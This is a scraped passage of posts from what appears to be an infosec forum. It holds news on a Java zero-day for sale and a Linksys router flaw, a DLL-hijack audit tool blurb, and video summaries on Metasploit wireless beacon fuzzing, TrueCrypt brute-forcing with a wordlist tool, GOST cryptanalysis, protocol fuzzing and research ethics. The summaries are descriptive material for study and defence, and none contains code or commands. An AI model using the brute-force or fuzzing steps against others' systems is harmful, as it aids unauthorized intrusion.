  18. [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD]Dll Hijack Auditor is the smart tool to Audit against the Dll Hijacking Vulnerability in any Windows application. This is one of the critical security issue affecting almost all Windows systems. Though most of the apps have been fixed, but still many Windows applications are susceptible to this vulnerability which can allow any attacker to completely take over the system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] DllHijackAuditor helps in discovering all such Vulnerable Dlls in a Windows application which otherwise can lead to successful exploitation resulting in total compromise of the system. With its simple GUI interface DllHijackAuditor makes it easy for anyone to instantly perform the auditing operation. It also presents detailed technical Audit report which can help the developer in fixing all vulnerable points in the application. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]DllHijackAuditor is a standalone portable application which also comes with Installer for local Installation & Uninstallation of software. It works on wide range of platforms starting from Windows XP to latest operating system, Windows 8.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Here are some of the smart features of DllHijackAuditor,[/TD] [/TR] [TR] [TD] Directly & Instantly audit any Windows Application. Allows complete testing to uncover all Vulnerable points in the target Application Smart Debugger based 'Interception Engine' for consistent and efficent performance without intrusion. Support for specifying as well as auditing of application with custom & multiple Extensions. Timeout Configuration to alter the waiting time for each Application. Generates complete auditing report (in HTML format) about all vulnerable hijack points in the Application. GUI based tool, makes it easy for anyone with minimum knowledge to perform the auditing operation. Does not require any special privilege for auditing of the application (unless target application requires) Free from Antivirus as it does not use any shellcodes or exploit codes which trigger Antivirus to terminate the operation. Fully portable tool which can be run directly on any system. Support for local Installation and uninstallation of the software. [/TD] [/TR] [/TABLE] Download: http://securityxploded.com/dllhijackauditor.php
  19. Another Java exploit is on sale for $5,000 Criminals hit Java again just 24 hours after patch By Alastair Stevenson Wed Jan 16 2013, 16:55 ANOTHER EXPLOIT aimed at Oracle's Java software has appeared just days after the company rushed out a patch to fix a previous vulnerability. The exploit was detected on Wednesday by Krebsonsecurity and reportedly takes advantage of another zero day vulnerability in Java. "On Monday, an administrator of an exclusive cybercrime forum posted a message saying he was selling a new Java 0day to a lucky two buyers. The cost: starting at $5,000 each," wrote Brian Krebs. "The hacker forum admin's message promised weaponized and source code versions of the exploit. This seller also said his Java 0day - in the latest version of Java (Java 7 Update 11) - was not yet part of any exploit kits, including the Cool Exploit Kit." If accurate, then the zero day vulnerability will be the second discovered this year. The first vulnerability was discovered after researchers spotted a ransomware Trojan known as Reveton targeting the flaw. Unlike the alleged new attack, the original vulnerability was linked with the popular Blackhole and Cool exploit kits. The kits are infamous toolkits traded on the black market that enable cybercriminals to mount automated attacks. The first attack led to widespread calls within the security industry for internet users to turn Java off. The warnings reached near panic levels when the US Computer Emergency Response Team (CERT) again recommended that internet users shut the software down mere days after Oracle released its security update. Despite the security fears some companies have noted that simply turning Java off might not be an option for large businesses. Krebbs was quick to reiterate this sentiment, noting that Java web apps were never designed for use in consumer transactions. "Much of the advice on how to lock down Java on consumer PCs simply doesn't scale in the enterprise, and vice-versa," wrote Krebbs. "Oracle's unprecedented four-day turnaround on a patch for the last zero-day flaw notwithstanding, the company lacks any kind of outward sign of awareness that its software is so broadly installed on consumer systems. "Oracle seems to be sending a message that it doesn't want hundreds of millions of consumer users; those users should listen and respond accordingly." At the time of publishing Oracle had not responded to a request from The INQUIRER for comment on the reported new Java vulnerability Sursa: Another Java exploit is on sale for $5,000- The Inquirer
  20. DefenseCode Warns of Linksys Router Security Flaw The researchers say they told Cisco about the vulnerability, but were informed it was already fixed. It wasn't. By Jeff Goldman | January 16, 2013 DefenseCode researchers recently uncovered a zero day vulnerability in Linksys routers. "Cisco Linksys is a very popular router with more than 70,000,000 routers sold," the researchers wrote. "That's why we think that this vulnerability deserves attention." "DefenseCode said the flaw is in the default installation of Linksys routers, which are primarily used in home networks," writes CSO Online's Antone Gonsalves. "The company showing a proof-of-concept exploit being used to gain root access to a Linksys model WRT54GL router." "They contacted Cisco and shared a detailed vulnerability description along with the PoC exploit for the vulnerability," writes Help Net Security's Mirko Zorz. "Cisco claimed that the vulnerability was already fixed in the latest firmware release, which turned out [to] be incorrect." "The vulnerability affects all versions of Linksys firmware up to and including the current version, 4.30.14," notes The Register's Richard Chirgwin. "DefenseCode intends to release a full description of the vulnerability within two weeks." "A patch is due out this week, days ahead of DefenseCode's scheduled release of the full vulnerability details," notes SC Magazine's Darren Pauli. Sursa: DefenseCode Warns of Linksys Router Security Flaw - eSecurity Planet
  21. Wireless Beacon Fuzzing Using Metasploit Description: In this video I will show you how to perform Fuzzing on wireless using Metasploit Framework. For this attack use Backtrack 5 R2 and install Lorcon 2. After launching the attack this module will start fuzzing AP and other devices and AP will not send anymore request to others, If you start monitoring the air you can see there are lots of Corrupted Fake Access Point so This module sends out corrupted beacon frames. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wireless Beacon Fuzzing Using Metasploit
  22. Security Evaluation Of Russian Gost Cipher Description: In this talk we will survey some 30 recent attacks on the Russian GOST block cipher. Background: GOST cipher is the official encryption standard of the Russian federation, and also has special versions for the most important Russian banks. Until 2012 there was no attack on GOST when it is used in encryption with random keys. I have developed more than 30 different academic attacks on GOST the fastest has complexity of 2^118 to recover some but not all 256-bit keys generated at random, which will be presented for the first time at CCC conference. It happens only once per decade that a government standard is broken while it is still an official government standard (happened for DES and AES, no other cases known). All these are broken only in academic sense, for GOST most recent attacks are sliding into maybe arguably practical in 30 years from now instead of 200 years... Our earlier results were instrumental at ISO for rejecting GOST as an international encryption standard last year. Not more than 5+ block cihers have ever achieved this level of ISO standardisation in 25 years and it NEVER happended in history of ISO that a cipher got broken during the standardization process. Two main papers with 70+30 pages respectively which are Cryptology ePrint Archive: Report 2011/626 and Cryptology ePrint Archive: Report 2012/138. Two other papers have been already published in Cryptologia journal which specializes in serious military and government crypto. The talk will cover three main families of attacks on GOST: high-level transformations, low- level inversion/MITM/guess-then-software/algebraic attacks and advanced truncated differential cryptanalysis of GOST. Plan for the talk: First I cover the history of GOST with major Cold War history events as the necessary background. Then I describe in details three main families of attacks: 1) self-smilarity attacks which generalize slide fixed point and reflection attacks, and provide a large variety of ways in which the security of the full GOST cipher with 32 rounds can be reduced to the security of GOST with 8 rounds in a black box reduction and thus the task of the cryptanalys is split into two well-defined tasks. 2) detailed software/algebraic and MITM attacks on 8 rounds and how weak diffusion in GOST helps. 3) advanced truncated differential attacks on GOST Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Security Evaluation Of Russian Gost Cipher
  23. Brute Force Attack On Truecrypt Description: In this video I will show you how to perform a brute-force attack on encrypted truecrypt file or drive. You need one tool called tc-guessus and one wordlist. This tool is very simple and easy to use if your password is in the word list so you can crack the file easily. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute Force Attack On Truecrypt
  24. Ethics In Security Research Description: Recently, several research papers in the area of computer security were published that may or may not be considered unethical. Looking at these borderline cases is relevant as today's research papers will influence how young researchers conduct their research. In our talk we address various cases and papers and highlight emerging issues for ethic committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. For researchers in computer security the recent success of papers such as [KKL+09] are an incentive to follow along a line of research where ethical questions become an issue. In our talk at the conference we will address various cases and papers and provide possible guidelines for ethic committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. While some actions might not be illegal they still may seem unethical. Key phrases that would be addressed in the discussion: (1) Do not harm users actively, (2) Watching bad things happening, (3) Control groups, (4) Undercover work. In the following, we introduce some lines of thought that should be discussed throughout the talk: A first and seemingly straightforward principle is that researchers should not actively harm others. So deploying malware or writing and deploying new viruses is obviously a bad idea. Is it, however, ok to modify malware? Following the arguments of [KKL+08], one would not create more harm if, for instance, one would instrumentalized a virus so that it sends us statistical data about its host. Such a modification could be made by the ISP or the network administrators at a university network. If this modification makes the virus less likely to be detected by anti-virus software, the case, however, changes. Then this is analogous to distributing a new virus. A few quick lab experiments have shown that malware that is detected by virus scanners is very often not picked up after it has been modified. Stealing a user's computing and networking resources may harm her; however, if some other malware already steals the resources one could argue that the damage is less since the researcher's software does "less bad things". This is basically what the authors of [KKL+08] argue. So when taking over a botnet, generating additional traffic would not be permissible whereas changing traffic would be. The real-world analogue is that you see someone breaking in a house, you scare the person away and then you go in and only look around, for instance, to understand how the burglar selected the target and what he was planning to steal, which is "less bad" than the stealing what the burglar was probably planning to do. There is a line of research when researchers only passively observe malware and phishing without modifying any content or receivers. When thinking of research ethics of "watching what happens", the Tuskegee Study of Syphilis [W1] comes to mind. Patients were not informed about available treatments, no precautions were taken that patients did not infect others, and they were also actively given false information regarding treatment. Today it is obvious that the study is unethical. As done in [bSBK09] the best way is to ask people for their consent prior to the experiment. In other studies, involving, for instance, botnets, this procedure may be impossible as a host computer can only be contacted after sending modified messages. In a botnet study such as [sGCC+09] it seems both feasible and responsible to inform a user that her computer is part of a botnet. However obvious this may seem, there might be multiple users on an infected machine and informing an arbitrary user could cause some additional harm. For instance, the infection of an office computer may have been caused by deactivating the anti-virus software, surfing to Web pages not related to work, etc. Thus informing one person could cause another person to lose his job. While this is not as extreme as the "Craiglist experiment" [W2] similar impacts are conceivable. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ethics In Security Research
  25. How I Met Your Pointer Description: An approach to the problem of fuzzing proprietary protocols will be shown, focusing on network protocols and native software. In the course of this talk I will combine several methods in order to force the client software to work as a "double agent" against the server. An interesting approach to the problem of fuzzing proprietary protocols will be presented. Since the method is applicable to several kinds of software and in order to keep an example in mind through all the talk, I will be focusing on network protocols and native software. The main idea behind it is very simple: "in a client/server architecture, the client knows how the protocol works." In the course of this talk I will need to combine several methodologies in order to "force" the client software to work as a "double agent" against the server. Advanced hooking, dynamic binary instrumentation and differential debugging are among the topics discussed here. The talk includes a live demo of this method in which a small program implementing a proprietary protocol will be fuzzed (without knowledge of it) and a memory corruption will be found. Last but not least, the talk is written in a very amusing style with multiple references to "nerd culture" and interacting with the audience to make the (hard) topic as interesting and entertaining as it can be. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: How I Met Your Pointer
×
×
  • Create New...